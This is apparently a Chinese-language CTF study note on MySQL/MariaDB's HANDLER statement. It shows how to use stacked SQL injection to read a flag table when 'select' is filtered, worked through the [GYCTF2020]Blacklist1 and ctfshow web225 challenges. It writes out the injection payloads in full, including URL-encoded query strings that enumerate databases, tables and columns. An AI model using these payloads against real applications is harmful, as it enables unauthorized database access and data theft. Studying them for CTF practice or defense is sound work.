HANDLER命令
HANDLER 是 MySQL 和 MariaDB 特有的非标准 SQL 语句。它允许你直接与存储引擎(如 InnoDB, MyISAM)进行交互,绕过 SQL 优化器。
使用 HANDLER 通常分为三步:打开表、读取数据、关闭表。
HANDLER table_name OPEN; -- 打开表的句柄
HANDLER table_name READ (FIRST/NEXT/索引名 = ('值')); -- 读取数据
--HANDLER users READ idx = ('admin'); 读取idx索引中值为'admin'的行
HANDLER table_name CLOSE; -- 关闭句柄
用途:
直接逐行读取表数据,无需指定列名,适合探测未知表结构。
列题[GYCTF2020]Blacklist1
查1'发现显示
过滤了好多东西,可以使用堆叠注入
试试show tables和show databases,发现FlagHere,(查数据库是一个伏笔
slelect因为被过滤了,所以使用handler命令
挨个用库试试,最后试到supersqli,下面就是语句了
?inject=1'; -- 闭合原查询并结束语句
use supersqli; -- 切换到数据库 `supersqli`
HANDLER FlagHere OPEN; -- 打开表 `FlagHere` 的句柄
HANDLER FlagHere READ FIRST; -- 读取表的第一行数据
HANDLER FlagHere CLOSE; -- 关闭句柄
完整拼接后的SQL(假设原查询为SELECT * FROM table WHERE id='用户输入'):
SELECT * FROM table WHERE id='1';
USE supersqli;
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
例题ctfshowweb225
前三部分用show拿信息
username=';show%20databases;
username=';show%20tables%20from%20ctfshow_web;
username=';show%20columns%20from%20ctfshow_web.ctfshow_flagasa;
禁用了select,我们用handler来读取
username=';handler%20ctfshow_flagasa%20open;handler%20ctfshow_flagasa%20read%20first;HANDLER%20ctfshow_flagasa%20CLOSE;